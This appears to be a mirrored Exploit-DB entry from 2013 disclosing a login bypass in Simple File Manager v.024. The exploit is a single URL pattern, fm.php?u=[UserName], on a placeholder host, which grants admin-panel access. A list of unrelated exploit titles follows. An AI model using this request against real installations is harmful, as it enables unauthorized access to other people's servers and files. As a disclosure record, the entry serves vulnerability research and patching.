Simple File Manager 024 – Authentication Bypass

Exploit Database
12 阅读

作者： Chako

日期： 2013-06-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/26246/

# Exploit Title: Simple File Manager v.024 Login Bypass Vulnerability
# Date Published: 2013/6/17
# Exploit Author: Chako
# Software Link: http://onedotoh.sourceforge.net/
# Version: v.024 (Doesn't work on v.025)


Description:
=====================
A vulnerability has been identified in Simple File Manager v.024, which could be exploited 
by attackers to bypass security restrictions into admin panel.


Exploit:
=====================
An attacker can exploit this issue using a browser.


http://www.target_example.com/fm.php?u=[UserName]

last Exploits
Simple File Manager 024 – Authentication Bypass的更多信息

Boelter Blue System Management 1.3 – SQL Injection：
Online Ordering System 1.0 – Arbitrary File Upload：
Readmore Systems Script – SQL Injection：
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)：
DBPower C300 HD Camera – Remote Configuration Disclosure：
TP-Link Archer CR-700 – Cross-Site Scripting：
Ginkgo CMS – ‘index.php?rang’ SQL Injection：
WordPress Plugin Event List < 0.7.8 - SQL Injection：